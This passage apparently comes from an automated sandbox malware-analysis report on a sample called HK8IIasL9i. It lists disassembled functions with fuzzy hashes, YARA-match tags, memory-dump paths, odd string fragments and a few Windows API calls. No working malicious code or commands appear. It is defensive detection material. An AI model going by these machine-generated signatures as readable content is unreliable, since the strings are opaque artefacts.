                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                        • API String ID: 0-2309992716
                                                                                                                                                                                                                                                        • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                        • Instruction ID: f21cbf07b5fb6c9c506112b4232b545a4245f283b5556d75b955b3e1d66eb6c8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E6127A164D3C68AE3118F3988A076AFFE09FA3310F18496DE5D14B392D379CA0DD716
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                                                                                                                                                                                                        • API String ID: 0-1906979145
                                                                                                                                                                                                                                                        • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                                                                                                                                                                        • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00738B83
                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00738B8C
                                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00738C42
                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00738C9A
                                                                                                                                                                                                                                                          • Part of subcall function 0073C7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 0073C7CA
                                                                                                                                                                                                                                                          • Part of subcall function 0073B5F7: FreeLibrary.KERNEL32(00738D1F), ref: 0073B5FD
                                                                                                                                                                                                                                                          • Part of subcall function 0073B5F7: FreeLibrary.KERNEL32 ref: 0073B61E
                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00738D38
                                                                                                                                                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
• String ID:
• API String ID: 3072701918-0
• Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
• Instruction ID: 308647a4ad0ef8c94426d7820f489bbdbf073f739de408d25376ecf92803adad
• Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
• Instruction Fuzzy Hash: FC51A8B7F102180BE71CAEB9CC4A79975878BC9710F1E813D6941DF3D2EDB8880142C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: )G+I$+K M$B~B$|B$s0u
• API String ID: 0-2670551875
• Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
• Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
• Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
• Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: KT$Q$SV$p8`;$xy
• API String ID: 0-2575762000
• Opcode ID: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
• Instruction ID: ecfd4d91e86c567b56f86f4e5e07f1101c977c29d49ab91fcc3dd01370d581e2
• Opcode Fuzzy Hash: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
• Instruction Fuzzy Hash: 23910EB6A0C3549FD304DF56C84155FBBE2BFD5300F09896DE8C88B201EA35CA09CB86
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: "$-+$/$hI
• API String ID: 0-2772680581
• Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
• Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
• Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
• Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: "$-+$/$hI
• API String ID: 0-2772680581
• Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
• Instruction ID: 720b96add61f48b1b47b5c158fca18041c49100f478495a8c7c022762aa19806
• Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
• Instruction Fuzzy Hash: AE42177550C3918FD721CF24C840A6EBBE1BF92314F188A6CE8E95B392D73AD905CB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0u4w$_q$qr$xy
• API String ID: 0-1225007230
• Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
• Instruction ID: 0823e46cbf7034a124ba1dd62f8fe3ea8d572e3a30188e3aed6df063fca81eb1
• Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
• Instruction Fuzzy Hash: E191D1B1A08311CBC724CF58C89276BB7F1EF95324F18996CE8CA8B391E7789905C756
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
• API String ID: 0-909542228
• Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
• Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
• Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
• Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
• API String ID: 0-909542228
• Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
• Instruction ID: 4b7d95f150c1204aca9568637bf4e0cca31d958964639a836a43443006162250
• Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
• Instruction Fuzzy Hash: 8C915D71A0C3D08FE3358B3984517ABBBD29FD3315F19896DD8D99B382C6B94809CB52
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
• API String ID: 0-909542228
• Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
• Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                        • Instruction ID: 101dabf25a0a494e7b668ffbb401c3c8fb11e40dafbb144ac0692bfa825f37a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE915C71A0C3D08FE3358B3584517ABBBD29FD3315F18896DC8D99B782CAB94809CB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                        • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                        • Instruction ID: dceea04e144445077fcf7f242adccfdfe8ef9f13d4949891ea6f53c6b8cde413
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA916E71A083D08FE3358B3984517EBBBD29FE3315F18895DD8D99B782C6794809CB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                        • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                        • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                        • Instruction ID: 7ae1a73dd4e4753b2928b4659c9b54f8291e04f60f5df2e041617017ab7ae1cf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A816A729083D08FE335CF3588517ABBBD2AFE3305F18895DC8C95B682C6794809CB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: /G$I$7N1@$Fg)i${\}
                                                                                                                                                                                                                                                        • API String ID: 0-149357369
                                                                                                                                                                                                                                                        • Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                        • Instruction ID: 8c3c4d83ac39eb0b40010bdbbfff0587a1052f2449081dc979a663940944afc9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9218BB55193809BC314CF66884161BFBE2BBD2705F25992DF0C85B255D7B48906CF8B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: InitializeThunk
• String ID: ,$i$r}A
• API String ID: 2994545307-2114006112
• Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
• Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
• Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
• Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: gfff$i$r}A
• API String ID: 0-3931832132
• Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
• Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
• Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
• Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: <pr$st$y./
• API String ID: 0-3839595785
• Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
• Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
• Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
• Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: <pr$st$y./
• API String ID: 0-3839595785
• Opcode ID: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
• Instruction ID: 93ef230720344acf8da617301085d1b9285f669a26e567fd11633f10e9a57783
• Opcode Fuzzy Hash: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
• Instruction Fuzzy Hash: A2C13B72A043018BD7249F24C8526ABB3E1EFD6315F19852DED9697342E7BC9D0AC392
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: 34$C]$|F
• API String ID: 0-2804560523
• Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
• Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
• Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
• Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: 34$C]$|F
• API String ID: 0-2804560523
• Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
• Instruction ID: 522bdb4bbef70785227e5f0632603bd50798a6816371f31868b372b086f65a60
• Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
• Instruction Fuzzy Hash: C5C10FB69083518BC720CF28C88166BB3F2FF95314F19895CE8D58B390E779AD05CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: #XXL$=$BC
• API String ID: 0-2546488661
• Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
• Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
• Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
• Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: InitializeThunk
• String ID: 1234$oQ3$sQ3
• API String ID: 2994545307-3057079318
• Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
• Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
• Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
• Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: 12347$oQ3$sQ3
• API String ID: 0-1755585375
• Opcode ID: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
• Instruction ID: d38361e1daffc89315ceec1f672a606886a28696da5ebf4a2438546b3223ad54
• Opcode Fuzzy Hash: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
• Instruction Fuzzy Hash: DFB13372A083518BC728CE28D89096BB7E2EB95300F19853CED9797255D735AD01CB82
Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Ef$TQ][$sWK)
                                                                                                                                                                                                                                                        • API String ID: 0-3401374238
                                                                                                                                                                                                                                                        • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                                                                                                                                                                        • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Ef$TQ][$sWK)
                                                                                                                                                                                                                                                        • API String ID: 0-3401374238
                                                                                                                                                                                                                                                        • Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                                                                                                                                                                        • Instruction ID: 9cbcb5ce71e577d69acf885f1bfd9260fbb84fbc9d6754ea0596745cf7322951
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52B1043151D3D08ED7398F3994907ABBBE0AFA7305F04499CD4D95B282D779860ACB63
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
